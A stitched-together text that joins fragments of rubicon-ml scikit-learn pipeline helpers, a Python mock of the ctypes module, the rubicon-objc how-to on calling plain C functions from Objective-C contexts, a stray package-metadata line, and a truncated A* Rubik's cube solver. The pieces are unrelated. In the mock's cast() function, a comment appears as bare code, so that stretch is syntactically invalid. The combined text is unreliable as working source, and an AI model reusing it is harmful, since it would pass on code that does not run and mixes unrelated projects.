    user_defined_loggers = _name_loggers(steps, loggers)

    return RubiconPipeline(project, steps, user_defined_loggers, experiment_kwargs, memory, verbose)
def _split_steps_loggers(steps):
    """Split `(estimator, logger)` pairs into parallel lists.

    Bare estimators (non-tuples) get a `None` placeholder in the logger
    list so the two returned lists stay index-aligned, matching the
    format scikit-learn expects for its steps.

    Parameters
    ----------
    steps: list of sklearn.Estimator or tuples of (sklearn.Estimator,
    rubicon_ml.sklearn.EstimatorLogger).
        The steps and estimator loggers to split.

    Returns
    -------
    list of sklearn.Estimator and list of rubicon_ml.sklearn.EstimatorLogger
        The ordered lists of estimators and rubicon-ml loggers.
    """
    estimators = []
    loggers = []

    for entry in steps:
        if isinstance(entry, tuple):
            estimator, logger = entry
        else:
            estimator, logger = entry, None

        estimators.append(estimator)
        loggers.append(logger)

    return estimators, loggers
def _name_loggers(steps, loggers):
    """Pair each non-`None` logger with its step's name.

    Parameters
    ----------
    steps: list of tuples of (str, sklearn.Estimator)
        The named estimator steps.
    loggers: list of rubicon_ml.sklearn.EstimatorLogger
        The rubicon-ml loggers, index-aligned with `steps`.

    Returns
    -------
    dict of str, rubicon_ml.sklearn.EstimatorLogger
        The named rubicon-ml loggers.
    """
    named_loggers = {}

    # `steps` and `loggers` are index-aligned, so zip them directly.
    for (step_name, _), logger in zip(steps, loggers):
        if logger is not None:
            named_loggers[str(step_name)] = logger

    return named_loggers
import struct
# We pretend to be a 64-bit system.
# Pointer width in bytes for every pointer-like type in this shim.
_POINTER_SIZE = 8


class ArgumentError(Exception):
    """Raised when a foreign-function call receives invalid arguments
    (mirrors ``ctypes.ArgumentError``)."""

    pass


# Cache of dynamically created array types, keyed by (element type, length),
# so `ctype * n` always returns the same class object.
_array_type_cache = {}
class _CDataMeta(type):
    """Metaclass that implements ``ctype * length`` array-type creation."""

    def __mul__(self, count):
        # Memoize the generated array class so repeated `ctype * n`
        # expressions yield the identical type object.
        key = (self, count)
        if key not in _array_type_cache:
            _array_type_cache[key] = type(
                f"{self.__name__}_Array_{count}",
                (Array,),
                {"_type_": self, "_length_": count},
            )
        return _array_type_cache[key]
class _CData(metaclass=_CDataMeta):
    """Base class for all emulated ctypes data types in this shim."""

    @classmethod
    def from_address(cls, address):
        # The address is ignored — this shim cannot read real memory, so a
        # default-constructed instance stands in for the dereferenced value.
        return cls()

    @classmethod
    def in_dll(cls, dll, name):
        # DLL symbols cannot be resolved here; return a default instance.
        return cls()

    def _auto_unwrap(self):
        # Non-simple types are returned as-is (no `.value` extraction).
        return self
class _SimpleCData(_CData):
    """Base for scalar types; subclasses define ``_type_`` (a struct format
    code) and ``_DEFAULT_VALUE``."""

    @classmethod
    def _sizeof(cls):
        # Size follows directly from the struct-module format code.
        return struct.calcsize(cls._type_)

    def __new__(cls, value=None):
        instance = super().__new__(cls)
        if value is None:
            instance.value = cls._DEFAULT_VALUE
        else:
            instance.value = value
        return instance

    def __init__(self, value=None):
        # All state is assigned in __new__; kept only for the ctypes-like
        # constructor signature.
        pass

    def _auto_unwrap(self):
        # Direct subclasses (c_int, c_char_p, ...) unwrap to their plain
        # Python value; deeper subclasses stay wrapped.
        if _SimpleCData in type(self).__bases__:
            return self.value
        return self
class py_object(_SimpleCData):
    """Mock of ctypes.py_object (struct code "O")."""
    _type_ = "O"
    _DEFAULT_VALUE = None
    @classmethod
    def _sizeof(cls):
        # A Python object reference is pointer-sized.
        return _POINTER_SIZE
# Fixed-size scalar types. Each class's ``_type_`` is the struct-module
# format code that _SimpleCData._sizeof uses to compute its size.
class c_short(_SimpleCData):
    _DEFAULT_VALUE = 0
    _type_ = "h"
class c_ushort(_SimpleCData):
    _DEFAULT_VALUE = 0
    _type_ = "H"
class c_long(_SimpleCData):
    _DEFAULT_VALUE = 0
    _type_ = "l"
class c_ulong(_SimpleCData):
    _DEFAULT_VALUE = 0
    _type_ = "L"
class c_int(_SimpleCData):
    _DEFAULT_VALUE = 0
    _type_ = "i"
class c_uint(_SimpleCData):
    _DEFAULT_VALUE = 0
    _type_ = "I"
class c_float(_SimpleCData):
    _DEFAULT_VALUE = 0.0
    _type_ = "f"
class c_double(_SimpleCData):
    _DEFAULT_VALUE = 0.0
    _type_ = "d"
class c_longdouble(_SimpleCData):
    _DEFAULT_VALUE = 0.0
    _type_ = "g"
# On the pretend 64-bit platform (see _POINTER_SIZE) ``long`` is treated as
# wide enough, so the long-long types simply alias the long types.
c_longlong = c_long
c_ulonglong = c_ulong
class c_ubyte(_SimpleCData):
    _DEFAULT_VALUE = 0
    _type_ = "B"
class c_byte(_SimpleCData):
    _DEFAULT_VALUE = 0
    _type_ = "b"
class c_char(_SimpleCData):
    _DEFAULT_VALUE = b"\x00"
    _type_ = "c"
class c_char_p(_SimpleCData):
    _DEFAULT_VALUE = None
    _type_ = "z"
    # A C string is a pointer, so it reports pointer size.
    @classmethod
    def _sizeof(cls):
        return _POINTER_SIZE
class c_void_p(_SimpleCData):
    _DEFAULT_VALUE = None
    _type_ = "P"
    @classmethod
    def _sizeof(cls):
        return _POINTER_SIZE
class c_bool(_SimpleCData):
    _DEFAULT_VALUE = False
    _type_ = "?"
class c_wchar_p(_SimpleCData):
    _DEFAULT_VALUE = None
    _type_ = "Z"
    # A wide-character string is also a pointer.
    @classmethod
    def _sizeof(cls):
        return _POINTER_SIZE
class c_wchar(_SimpleCData):
    _DEFAULT_VALUE = "\x00"
    _type_ = "u"
# Platform-size and exact-width integer aliases mapped onto the fixed-size
# classes above (consistent with the pretend 64-bit LP64 layout).
c_size_t = c_ulong
c_ssize_t = c_long
c_int8 = c_byte
c_uint8 = c_ubyte
c_int16 = c_short
c_uint16 = c_ushort
c_int32 = c_int
c_uint32 = c_uint
c_int64 = c_long
c_uint64 = c_ulong
class _Pointer(_CData):
    """Base class for the pointer types generated by POINTER()."""
    pass


# Generated pointer types, keyed by the pointed-to ctype. The None entry
# makes POINTER(None) behave like a plain void pointer.
_pointer_type_cache = {None: c_void_p}


def POINTER(ctype):
    """Return the (cached) pointer type for *ctype*, creating it on first use."""
    if ctype not in _pointer_type_cache:
        _pointer_type_cache[ctype] = type(
            f"LP_{ctype.__name__}", (_Pointer,), {"_type_": ctype}
        )
    return _pointer_type_cache[ctype]


def pointer(cvalue):
    """Return a new pointer instance referring to *cvalue*."""
    return POINTER(type(cvalue))(cvalue)
class Array(_CData):
    # Base class for the array types generated by _CDataMeta.__mul__ (the
    # ``ctype * count`` syntax); generated subclasses carry _type_ and _length_.
    pass
class Structure(_CData):
    """Mock of ctypes.Structure: stores ``_fields_`` as plain attributes."""

    def __init__(self, *args):
        super().__init__()
        fields = type(self)._fields_
        if args:
            # Positional arguments map onto the leading fields, in order.
            for (field_name, _field_type), value in zip(fields, args):
                setattr(self, field_name, value)
        else:
            # No arguments: every field gets its ctype's default value,
            # unwrapped to a plain Python value where applicable.
            for field_name, field_type in fields:
                setattr(self, field_name, field_type()._auto_unwrap())
class Union(_CData):
    # Stub: no union semantics are modeled; the name exists so code that
    # subclasses ctypes.Union still imports.
    pass
class CFuncPtr(_CData):
    """Mock foreign-function pointer: records where it came from and, when
    called, returns a default-constructed result instead of entering native
    code."""
    # Class-level defaults; CFUNCTYPE/PYFUNCTYPE subclasses override these.
    _restype_ = None
    _argtypes_ = ()
    def __init__(self, src):
        super().__init__()
        if isinstance(src, tuple):
            # Looked up through a library: src is (symbol name, CDLL instance).
            (name, dll) = src
            self._func_name = name
            self._dll_name = dll._name
        else:
            # Constructed directly (e.g. as a callback); no origin to record.
            self._func_name = None
            self._dll_name = None
        # Instance copies so callers may reassign restype/argtypes per the
        # real ctypes API without touching the class.
        self.restype = type(self)._restype_
        self.argtypes = type(self)._argtypes_
    def __call__(self, *args):
        if self.restype is None:
            return None
        else:
            # Special case for the Objective-C runtime: seed the result with
            # the hash of the looked-up name so repeated lookups of the same
            # class/protocol name produce the same value.
            if self._dll_name == "objc" and self._func_name in {
                "objc_getClass",
                "objc_getProtocol",
            }:
                res = self.restype(hash(args[0]))
            else:
                res = self.restype()
            return res._auto_unwrap()
# Cache of generated function-pointer types, keyed by (restype, argtypes).
_c_functype_cache = {}


def CFUNCTYPE(restype, *argtypes):
    """Return a cached CFuncPtr subclass for the given signature."""
    key = (restype, argtypes)
    if key not in _c_functype_cache:
        class CFunctionType(CFuncPtr):
            _argtypes_ = argtypes
            _restype_ = restype
        _c_functype_cache[key] = CFunctionType
    return _c_functype_cache[key]
def PYFUNCTYPE(restype, *argtypes):
    # Like CFUNCTYPE but not cached: each call builds a fresh subclass.
    class CFunctionType(CFuncPtr):
        _argtypes_ = argtypes
        _restype_ = restype
    return CFunctionType
def sizeof(ctype):
    # Delegate to the type's own _sizeof (struct-format or pointer size).
    return ctype._sizeof()
def addressof(cvalue):
    # Stand-in address: the CPython object id is stable for the object's
    # lifetime, which is enough for this mock.
    return id(cvalue)
def alignment(ctype):
    # Simplification: pretend alignment always equals size.
    return sizeof(ctype)
def byref(ctype):
    # Simplification: byref is indistinguishable from pointer() here.
    return pointer(ctype)
def cast(cvalue, ctype):
    if cvalue is already of the requested type, hand it back unchanged.
    if isinstance(cvalue, ctype):
        return cvalue
    else:
        # Otherwise re-wrap the raw .value in the target type.
        return ctype(cvalue.value)
def memmove(dst, src, count):
    # Raw memory copies cannot be mocked meaningfully.
    raise NotImplementedError(f"memmove({dst}, {src}, {count})")
def string_at(address):
    # Stub: always an empty C string, regardless of address.
    return c_char_p(b"")
class CDLL:
    """Mock of ctypes.CDLL: fabricates a function stub for any symbol name."""
    # Default return type for looked-up functions.
    _func_restype_ = c_int
    def __init__(self, name):
        super().__init__()
        self._name = name
        # Per-instance CFuncPtr subclass that captures this library's default
        # restype (mirrors how real ctypes builds a _FuncPtr per library).
        class _FuncPtr(CFuncPtr):
            _restype_ = self._func_restype_
        self._FuncPtr = _FuncPtr
    def __getattr__(self, name):
        # Only invoked for missing attributes. Refuse dunder names so
        # protocol probes (copy, pickle, inspect) fail normally instead of
        # receiving a fake function object.
        if name.startswith("__") and name.endswith("__"):
            raise AttributeError(name)
        func = self.__getitem__(name)
        # Cache on the instance so later lookups bypass __getattr__.
        setattr(self, name, func)
        return func
    def __getitem__(self, name_or_ordinal):
        func = self._FuncPtr((name_or_ordinal, self))
        if not isinstance(name_or_ordinal, int):
            # Integer ordinals have no usable name; string names become the
            # stub's __name__.
            func.__name__ = name_or_ordinal
        return func
class PyDLL(CDLL):
    # Behaves exactly like CDLL here; real ctypes.PyDLL differs only in GIL
    # handling, which this mock does not model.
    pass
# Mock of ctypes.pythonapi (the CPython C API exposed as a library).
pythonapi = PyDLL(None)
class LibraryLoader:
    """Creates and caches DLL wrapper objects on attribute or item access."""

    def __init__(self, dlltype):
        # The wrapper class (e.g. CDLL or PyDLL) to instantiate per library.
        self._dlltype = dlltype

    def __getattr__(self, name):
        # Only called for missing attributes; refuse private/dunder names so
        # normal attribute errors still surface.
        if name.startswith("_"):
            raise AttributeError(name)
        library = self._dlltype(name)
        # Cache on the instance so subsequent lookups bypass __getattr__.
        setattr(self, name, library)
        return library

    def __getitem__(self, name):
        # Item access shares the attribute cache.
        return getattr(self, name)

    def LoadLibrary(self, name):
        # Explicit loads are intentionally uncached.
        return self._dlltype(name)
# Pre-built loaders matching the real ctypes module-level objects.
cdll = LibraryLoader(CDLL)
pydll = LibraryLoader(PyDLL)
=====================================
Calling plain C functions from Python
=====================================
Most Objective-C APIs are exposed through Objective-C classes and methods, but some parts are implemented as plain C functions. You might also want to use a pure C library that provides no Objective-C interface at all. Calling C functions is quite different from calling Objective-C methods and requires some additional work, which will be explained in this how-to.
.. seealso::
The `ctypes tutorial <https://docs.python.org/3/library/ctypes.html#ctypes-tutorial>`_ in the Python documentation, which explains how to call C functions in general (without a specific focus on Apple platforms and Objective-C).
A simple example: ``puts``
--------------------------
We'll start with a simple example: calling the ``puts`` function from the C standard library. ``puts`` takes a C string and outputs it to standard output --- it's the C equivalent of a simple ``print`` call.
Before we can call the function, we need to look it up first. To do this, we need to find and load the library in which the function is defined. In the case of standard C functions, this is the standard C library, ``libc``. Because this library is commonly used, Rubicon already loads it by default and exposes it in Python as :attr:`rubicon.objc.runtime.libc`.
.. code-block:: python
>>> from rubicon.objc.runtime import libc
>>> libc
<CDLL '/usr/lib/libc.dylib', handle 7fff60d0cb90 at 0x105850b38>
.. note::
For a list of all C libraries that Rubicon loads and exposes by default, see the :ref:`predefined-c-libraries` section of the :mod:`rubicon.objc.runtime` reference documentation.
To access a library that is not predefined by Rubicon, you can use the :func:`~rubicon.objc.runtime.load_library` function:
.. code-block:: python
>>> from rubicon.objc.runtime import load_library
>>> libm = load_library("m")
>>> libm
<CDLL '/usr/lib/libm.dylib', handle 7fff60d0cb90 at 0x10596be10>
C functions are accessed as attributes on their library:
.. code-block:: python
>>> libc.puts
<_FuncPtr object at 0x110178f20>
However, unlike Objective-C methods, we cannot call C functions right away --- we must first declare the function's argument and return types. (Rubicon cannot do this automatically like with Objective-C methods, because plain C doesn't provide the runtime type information necessary for this.) This type information is found in C header files, in this case ``stdio.h`` (which defines standard C input/output functions, including ``puts``).
The exact location of the macOS C headers varies depending on your version of macOS and the developer tools --- it is not a fixed path. To open the header directory in the Finder, run the following command in the terminal:
.. code-block:: sh
$ open "$(xcrun --show-sdk-path)/usr/include"
.. note::
This command requires a version of the macOS developer tools to be installed. If you do not have Xcode or the command-line developer tools installed yet, run this command in the terminal to install the command-line developer tools:
.. code-block:: sh
$ xcode-select --install
Once you have opened the relevant header file in a text editor, you need to search for the declaration of the function you're looking for. In the case of ``puts``, it looks like this:
.. code-block:: c
int puts(const char *);
This means that ``puts`` returns an ``int`` and takes a single argument of type ``const char *`` (a pointer to one or more characters, i.e. a C string). This translates to the following Python ``ctypes`` code:
.. code-block:: python
>>> from ctypes import c_char_p, c_int
>>> libc.puts.restype = c_int
>>> libc.puts.argtypes = [c_char_p]
Now that we have provided all of the necessary type information, we can call ``libc.puts``.
For the ``c_char_p`` argument, we pass a byte string with the message we want to print out. ``ctypes`` automatically converts the byte string object to a ``c_char_p`` (``char *``) as the C function expects it. The string specifically needs to be a byte string (``bytes``), because C's ``char *`` strings are byte-based, unlike normal Python strings (``str``), which are Unicode-based.
.. code-block:: python
>>> res = libc.puts(b"Hello!")
Hello!
.. note::
If you're running this code from an editor or IDE and don't see ``Hello!`` printed out, try running the code from a Python REPL in a terminal window instead. Some editors/IDEs, such as Python's IDLE, can only capture and display output produced by high-level Python functions (such as ``print``), but not output from low-level C functions (such as ``puts``).
The return value of ``puts`` is ignored in this example. It indicates whether or not the call was successful. If ``puts`` succeeds, it returns a non-negative integer (the exact value is not significant and has no defined meaning). If ``puts`` encounters an error, it returns the ``EOF`` constant (on Apple OSes, this is ``-1``).
The ``puts`` function generally doesn't fail, except for edge cases that are unlikely to happen in practice. With most other C functions, you need to be more careful about checking the return value, to make sure that errors from the function call are detected and handled. Unlike in Python, if you forget to check whether a C function call failed, any errors from that call are silently ignored, which often leads to bad behavior or crashes.
Most real examples of C functions are more complicated than ``puts``, but the basic procedure for calling them is the same: import or load the function's C library, set the function's return type and argument types based on the relevant header, and then call the function as needed.
Each C library only needs to be imported/loaded once, and the ``restype`` and ``argtypes`` only need to be set once per function. This is usually done at module level near the beginning of the module, similar to Python imports.
Inline functions (e.g. ``NSLocationInRange``)
---------------------------------------------
Regular C functions can be called as explained above, but there is also a second kind of C function that needs to be handled differently: inline functions. Unlike regular C functions, inline functions cannot be called through a library object at runtime. Instead, their implementation is only provided as source code in a header file.
When an inline function is called from regular C code, the C compiler copies (inlines) the inline function's implementation into the calling code. To call an inline C function from Python, we need to do the same thing --- copy the code from the header into our own code --- but in addition we need to translate the C code from the header into equivalent Python/``ctypes`` code.
As an example we will use the function ``NSLocationInRange`` from the Foundation framework. This function checks whether an index lies inside a ``NSRange`` value. The definition of this function, from the Foundation header ``NSRange.h``, looks like this:
.. code-block:: objc
NS_INLINE BOOL NSLocationInRange(NSUInteger loc, NSRange range) {
return (!(loc < range.location) && (loc - range.location) < range.length) ? YES : NO;
}
In this case, the translation to Python consists (roughly) of the following steps:
1. The outer part of the function definition needs to be translated to Python's ``def`` syntax. The return type and argument types can be omitted in the Python code --- because Python is dynamically typed, these explicit types are not needed.
2. The ``YES`` and ``NO`` constants in the ``return`` expressions need to be replaced with their Python equivalents, ``True`` and ``False``.
3. Some operators in the ``return`` expression need to be changed: C ``!cond`` translates to Python ``not cond``, C ``left && right`` becomes ``left and right``, and C ``cond ? true_val : false_val`` becomes ``true_val if cond else false_val``.
The translated Python code looks like this:
.. code-block:: python
def NSLocationInRange(loc, range):
return True if (not (loc < range.location) and (loc - range.location) < range.length) else False
You can then put this translated function into your Python code and call it in place of the corresponding C inline function.
.. note::
Python code translated from C like this is sometimes more complicated than necessary and can be simplified. In this case for example, ``True if cond else False`` can be simplified to just ``cond``, ``not (x < y)`` can be simplified to ``x >= y``, and a few redundant parentheses can be removed. A cleaner version of the translated code might look like this:
.. code-block:: python
def NSLocationInRange(loc, range):
return loc >= range.location and loc - range.location < range.length
Global variables and constants (e.g. ``NSFoundationVersionNumber``)
-------------------------------------------------------------------
Some C libraries expose not just functions, but also global variables. An example of this is the Foundation framework, which defines the global variable ``NSFoundationVersionNumber`` in ``<Foundation/NSObjCRuntime.h>``:
.. code-block:: objc
FOUNDATION_EXPORT double NSFoundationVersionNumber;
Like functions, global variables are accessed via the library that they are defined by. The syntax is somewhat different for global variables though - instead of reading them directly as attributes of the library object, you use the ``in_dll`` method of the variable's *type*. (Every ``ctypes`` type has an ``in_dll`` method.)
.. code-block:: python
>>> from ctypes import c_double
>>> from rubicon.objc.runtime import Foundation
>>> NSFoundationVersionNumber = c_double.in_dll(Foundation, "NSFoundationVersionNumber")
>>> NSFoundationVersionNumber
c_double(1575.23)
Note that ``in_dll`` doesn't return the variable's value directly - instead it returns a ``ctypes`` data object that has the variable's type, in this case ``c_double``. To access the variable's actual value, you can use the data object's ``value`` attribute:
.. code-block:: python
>>> NSFoundationVersionNumber.value
1575.23
Objective-C object constants
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
A special case of global variables is often found in Objective-C libraries: object constants. These are global Objective-C object variables with a ``const`` modifier, meaning that they cannot be modified. Constants of type ``NSString *`` are especially common and can be found in many places, such as Foundation's ``<Foundation/NSMetadataAttribute.h>``:
.. code-block:: objc
FOUNDATION_EXPORT NSString * const NSMetadataItemFSNameKey;
Because they are so common, Rubicon provides the convenience function ``objc_const`` specifically for accessing Objective-C object constants:
.. code-block:: python
>>> from rubicon.objc import objc_const
>>> from rubicon.objc.runtime import Foundation
>>> NSMetadataItemFSNameKey = objc_const(Foundation, "NSMetadataItemFSNameKey")
>>> NSMetadataItemFSNameKey
<rubicon.objc.collections.ObjCStrInstance 0x10eecf350: __NSCFConstantString at 0x1072a67e8: kMDItemFSName>
.. note::
Sometimes it's not obvious that a constant is an Objective-C object, because its actual type is hidden behind a ``typedef``. This is common with the "extensible string enum" pattern, where a set of related string constants are defined together. An example can be found in ``<Foundation/NSCalendar.h>``:
.. code-block:: objc
typedef NSString * NSCalendarIdentifier NS_EXTENSIBLE_STRING_ENUM;
FOUNDATION_EXPORT NSCalendarIdentifier const NSCalendarIdentifierGregorian;
FOUNDATION_EXPORT NSCalendarIdentifier const NSCalendarIdentifierBuddhist;
FOUNDATION_EXPORT NSCalendarIdentifier const NSCalendarIdentifierChinese;
// ... many more ...
Even though the constants use the type name ``NSCalendarIdentifier``, their actual type is still ``NSString *``, based on the ``typedef`` before.
In some cases, constants use a ``typedef`` from a different header (or even a different library) than the one defining the constants, which can make it even harder to tell that they are actually Objective-C objects.
A complex example: ``dispatch_get_main_queue``
----------------------------------------------
As a final example, we'll look at the function ``dispatch_get_main_queue`` from
the ``libdispatch`` library. This is a very complex function definition, which
involves many of the concepts introduced above, as well as heavy use of C
pre-processor macros. If you don't have a lot of experience with the C
pre-processor, you may want to skip this section.
.. This example is based on the response to a question from the beeware/general Gitter chat: https://gitter.im/beeware/general?at=5b54e95357f4f664b794cde2
First, we need to look at the function's definition, which is found in the header ``<dispatch/queue.h>``:
.. code-block:: objc
DISPATCH_INLINE DISPATCH_ALWAYS_INLINE DISPATCH_CONST DISPATCH_NOTHROW
dispatch_queue_main_t
dispatch_get_main_queue(void)
{
return DISPATCH_GLOBAL_OBJECT(dispatch_queue_main_t, _dispatch_main_q);
}
This is an inline function, which you can see based on the fact that it has a function body and the ``DISPATCH_INLINE``/``DISPATCH_ALWAYS_INLINE`` attributes. This means that we cannot look it up directly using ``ctypes`` - instead we have to translate the function body from C to Python.
We can ignore the first line of the function definition - they contain function attributes intended for the compiler, which we don't need. The second and third line indicate the function's signature - it takes no arguments and returns a value of type ``dispatch_queue_main_t``.
The body is a little more complex: it uses ``DISPATCH_GLOBAL_OBJECT``, which is actually a C macro. Its definition can be found in ``<dispatch/object.h>``:
.. code-block:: objc
#define DISPATCH_GLOBAL_OBJECT(type, object) ((OS_OBJECT_BRIDGE type)&(object))
If we substitute the macro's parameters (``type`` and ``object``) for their real values in our case (``dispatch_queue_main_t`` and ``_dispatch_main_q``), we get the expression ``((OS_OBJECT_BRIDGE dispatch_queue_main_t)&(_dispatch_main_q))``. ``OS_OBJECT_BRIDGE`` is also a macro, this time from ``<os/object.h>``:
.. code-block:: objc
#define OS_OBJECT_BRIDGE __bridge
It expands to ``__bridge``, which is an attribute related to Objective-C's automatic reference counting (ARC) feature. In the context of Rubicon, ARC is not relevant (Rubicon performs its own reference management for Objective-C objects), so we can ignore this attribute. This leaves us with the expression ``((dispatch_queue_main_t)&(_dispatch_main_q))``, which we can substitute for the macro call in our original function:
.. code-block:: objc
dispatch_queue_main_t
dispatch_get_main_queue(void)
{
    return ((dispatch_queue_main_t)&(_dispatch_main_q));
}
With the macro expansion done, we can now see what the function does: it takes a pointer to the global variable ``_dispatch_main_q`` and casts it to the type ``dispatch_queue_main_t``.
First, let's look at the definition of the ``_dispatch_main_q`` variable, from ``<dispatch/queue.h>``:
.. code-block:: objc
DISPATCH_EXPORT
struct dispatch_queue_s _dispatch_main_q;
The variable's type, ``struct dispatch_queue_s``, is an *opaque* structure type - it is not defined in any public header. This means that we don't know what fields the structure has, or even how large it is. As a result, we cannot perform any operations on the structure itself, but we can work with *pointers* to the structure - which is exactly what ``dispatch_get_main_queue`` does.
Even though ``struct dispatch_queue_s`` is opaque, we still need to define it in Python so that we can look up the ``_dispatch_main_q`` variable:
.. code-block:: python
from ctypes import Structure
from rubicon.objc.runtime import load_library
# On Mac, libdispatch is part of libSystem.
libSystem = load_library("System")
libdispatch = libSystem
class struct_dispatch_queue_s(Structure):
pass # No _fields_, because this is an opaque structure.
_dispatch_main_q = struct_dispatch_queue_s.in_dll(libdispatch, "_dispatch_main_q")
Now we need to look at the definition of the ``dispatch_queue_main_t`` type. This definition is not very obvious to find - it's actually this line in ``<dispatch/queue.h>``:
.. code-block:: objc
DISPATCH_DECL_SUBCLASS(dispatch_queue_main, dispatch_queue_serial);
``DISPATCH_DECL_SUBCLASS`` is a macro from ``<dispatch/object.h>``, defined like this:
.. code-block:: objc
#define DISPATCH_DECL_SUBCLASS(name, base) OS_OBJECT_DECL_SUBCLASS(name, base)
It directly calls another macro, ``OS_OBJECT_DECL_SUBCLASS``, defined in ``<os/object.h>``:
.. code-block:: objc
#define OS_OBJECT_DECL_SUBCLASS(name, super) \
OS_OBJECT_DECL_IMPL(name, <OS_OBJECT_CLASS(super)>)
Let's substitute this macro into our original code:
.. code-block:: objc
OS_OBJECT_DECL_IMPL(dispatch_queue_main, <OS_OBJECT_CLASS(dispatch_queue_serial)>);
Next is the ``OS_OBJECT_DECL_IMPL`` macro, also defined in ``<os/object.h>``:
.. code-block:: objc
#define OS_OBJECT_DECL_IMPL(name, ...) \
OS_OBJECT_DECL_PROTOCOL(name, __VA_ARGS__) \
typedef NSObject<OS_OBJECT_CLASS(name)> \
* OS_OBJC_INDEPENDENT_CLASS name##_t
After we substitute this macro into our code, it looks like this:
.. code-block:: objc
OS_OBJECT_DECL_PROTOCOL(dispatch_queue_main, <OS_OBJECT_CLASS(dispatch_queue_serial)>) \
typedef NSObject<OS_OBJECT_CLASS(dispatch_queue_main)> \
* OS_OBJC_INDEPENDENT_CLASS dispatch_queue_main_t;
And another macro, ``OS_OBJECT_DECL_PROTOCOL``, also from ``<os/object.h>``:
.. code-block:: objc
#define OS_OBJECT_DECL_PROTOCOL(name, ...) \
@protocol OS_OBJECT_CLASS(name) __VA_ARGS__ \
@end
Which we can substitute into our code:
.. code-block:: objc
@protocol OS_OBJECT_CLASS(dispatch_queue_main) <OS_OBJECT_CLASS(dispatch_queue_serial)> \
@end \
typedef NSObject<OS_OBJECT_CLASS(dispatch_queue_main)> \
* OS_OBJC_INDEPENDENT_CLASS dispatch_queue_main_t;
Now let's take care of the ``OS_OBJECT_CLASS`` macro, defined like this in ``<os/object.h>``:
.. code-block:: objc
#define OS_OBJECT_CLASS(name) OS_##name
And substituted into our code:
.. code-block:: objc
@protocol OS_dispatch_queue_main <OS_dispatch_queue_serial> \
@end \
typedef NSObject<OS_dispatch_queue_main> \
* OS_OBJC_INDEPENDENT_CLASS dispatch_queue_main_t;
Finally we're left with the ``OS_OBJC_INDEPENDENT_CLASS`` macro, which is a compiler attribute that we can ignore.
.. code-block:: objc
@protocol OS_dispatch_queue_main <OS_dispatch_queue_serial>
@end
typedef NSObject<OS_dispatch_queue_main> * dispatch_queue_main_t;
Now we're done with macro expansion and can see what the code actually does - it defines an Objective-C protocol called ``OS_dispatch_queue_main`` and defines ``dispatch_queue_main_t`` as a pointer type to an object conforming to that protocol. For our purposes, most of these details don't matter - the important part is that ``dispatch_queue_main_t`` is actually an Objective-C object pointer type. Because Rubicon doesn't differentiate between object pointer types, we can replace ``dispatch_queue_main_t`` in our original function with the generic ``id`` type:
.. code-block:: objc
id
dispatch_get_main_queue(void)
{
    return ((id)&(_dispatch_main_q));
}
This code can finally be translated to Python:
.. code-block:: python
from ctypes import byref, cast
from rubicon.objc import ObjCInstance
from rubicon.objc.runtime import objc_id
# This requires the _dispatch_main_q Python code from before.
def dispatch_get_main_queue():
return ObjCInstance(cast(byref(_dispatch_main_q), objc_id))
Further information
-------------------
* `cdecl.org <https://cdecl.org/>`_: An online service to translate C type syntax into more understandable English.
* `cppreference.com <https://en.cppreference.com/w/>`_: A reference site about the standard C and C++ languages and libraries.
* `Apple's reference documentation <https://developer.apple.com/documentation/>`_: Official API documentation for Apple platforms. Make sure to change the language to Objective-C in the top-right corner, otherwise you'll get Swift documentation, which can differ significantly from Objective-C.
* macOS man pages, sections 2 and 3: Documentation for the C functions provided by macOS. View these using the ``man`` command, or by typing a function name into the search box of the macOS Terminal's Help menu.
| /rubicon-objc-0.4.6.tar.gz/rubicon-objc-0.4.6/docs/how-to/c-functions.rst | 0.872538 | 0.770508 | c-functions.rst | pypi |
import numpy as np
from .cube import Cube
from typing import Callable
def same_color_amount(combinations: np.ndarray) -> int:
    """Heuristic: distance from having uniformly colored faces.

    For each face, counts the largest number of stickers sharing one color,
    sums those counts over all faces, and returns the gap to the perfect
    score (every sticker on every face the same color). Lower is better: a
    solved cube scores 0, so the value can be used directly as an A*
    heuristic estimate.

    Args:
        combinations (np.ndarray): Cube state of shape (6, n, n).

    Returns:
        int: ``6*n*n`` minus the summed per-face majority-color counts.
    """
    # Local renamed so it no longer shadows the function's own name.
    majority_total = sum(
        int(np.max(np.unique(face, return_counts=True)[1]))
        for face in combinations
    )
    # combinations.size == 6 * n * n for a (6, n, n) state; using .size
    # (instead of the previously hard-coded 6) keeps the heuristic consistent
    # even if a different face count is ever passed.
    return int(combinations.size) - majority_total
class AStarSolver:
    """A* search over cube states using a pluggable heuristic."""

    def __init__(self, cube: "Cube", heuristic: Callable):
        """Initialize the solver.

        Args:
            cube: The cube instance to solve.
            heuristic: Callable mapping a (6, n, n) combinations array to a
                non-negative number; expected to return lower values for
                states closer to solved.
        """
        self.cube = cube
        self.heuristic = heuristic
        # Possible moves are constant for a given cube. Whole-cube rotational
        # moves (anything containing 'x', 'y' or 'z') are excluded from the
        # search space, matching the original behavior.
        self.possible_moves = [
            move
            for move in cube.get_possible_moves()
            if not any(axis in move for axis in ("x", "y", "z"))
        ]

    def make_str(self, combinations: np.ndarray) -> str:
        """Flatten a combinations array into a single string.

        Note: not currently used by :meth:`solve`, which keys visited states
        with ``str(combinations)`` instead.

        Args:
            combinations: Cube state of shape (6, n, n); assumes the entries
                are strings.

        Returns:
            str: All stickers concatenated face by face, row by row.
        """
        return "".join("".join(row) for face in combinations for row in face)

    def solve(self) -> "tuple | str":
        """Run best-first (A*) search until a solved state is found.

        Returns:
            tuple of str: The moves that solve the cube, in order; an empty
            string if the cube is already solved.

        Raises:
            ValueError: If the search queue empties without reaching a
                solved state (an unsolvable/invalid cube).
        """
        if self.cube.is_solved():
            print("Cube is already solved!")
            return ""
        initial_combinations = self.cube.combinations.copy()
        # visited holds string snapshots of every state already queued; a set
        # gives O(1) membership tests (the previous list was O(n) per check).
        visited = {str(initial_combinations)}
        # Queue entries: (combinations, path-so-far, heuristic value).
        queue = [(initial_combinations, (), self.heuristic(initial_combinations))]
        print("current best cube value: ", queue[0][2])
        while queue:
            # A* priority f(n) = g(n) + h(n): moves taken so far plus the
            # heuristic estimate for the state.
            queue.sort(key=lambda entry: len(entry[1]) + entry[2])
            combinations, path, _value = queue.pop(0)
            if Cube.from_combinations(combinations).is_solved():
                return path
            for move in self.possible_moves:
                child_cube = Cube.from_combinations(combinations.copy())
                child_cube.make_move(move)
                new_combinations = child_cube.combinations
                key = str(new_combinations)
                if key in visited:
                    continue
                visited.add(key)
                queue_element = (
                    new_combinations.copy(),
                    (*path, move),
